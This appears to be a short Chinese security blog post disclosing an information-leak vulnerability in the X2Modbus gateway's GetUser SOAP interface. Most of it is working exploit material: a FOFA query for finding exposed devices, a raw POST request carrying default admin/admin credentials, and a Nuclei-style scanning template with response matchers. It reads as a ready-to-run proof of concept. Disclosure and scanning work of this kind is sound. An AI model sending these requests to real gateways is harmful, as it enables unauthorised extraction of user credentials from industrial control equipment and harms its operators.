X2Modbus网关GetUser接口存在一个信息泄漏漏洞,使得未经授权的用户或攻击者可以获取敏感信息。
server="SunFull-Webs" || icon_hash="-1384370370"
POST /soap/GetUser HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
<GetUser><User Name="admin" Password="admin"/></GetUser>
id: X2Modus-info
info:
name: X2Modbus网关-GetUser接口存在敏感信息泄露
author: nobody
severity: critical
description: |
X2Modbus网关GetUser接口存在一个信息泄漏漏洞,使得未经授权的用户或攻击者可以获取敏感信息。
impact: |
攻击者通过该漏洞可获取敏感信息
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: server="SunFull-Webs" || icon_hash="-1384370370"
tags: X2Modbus
requests:
- raw:
- |
POST /soap/GetUser HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
<GetUser><User Name="admin" Password="admin"/></GetUser>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "GetUserResult"
- type: status
status:
- 200
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.